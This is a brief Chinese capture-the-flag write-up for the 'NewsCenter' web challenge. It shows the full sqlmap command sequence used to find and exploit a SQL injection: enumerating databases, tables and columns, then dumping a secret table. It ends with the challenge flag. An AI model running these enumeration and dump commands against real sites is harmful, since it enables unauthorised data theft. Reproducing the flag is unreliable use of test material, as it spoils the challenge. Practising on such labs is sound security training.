打開環(huán)境
有查詢,猜測是sql注入
保存請求頭到文件中
準備利用sqlmap
查找數(shù)據(jù)庫
python sqlmap.py -r ./123.txt --dbs
查找表
python sqlmap.py -r ./123.txt --tables -D news
查找字段
python sqlmap.py -r ./123.txt --column -D news -T secret_table
顯示字段信息
python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g
得到flag文章來源:http://www.zghlxwxcb.cn/news/detail-700277.html
QCTF{sq1_inJec7ion_ezzz文章來源地址http://www.zghlxwxcb.cn/news/detail-700277.html
到了這里,關(guān)于攻防世界-WEB-NewsCenter的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!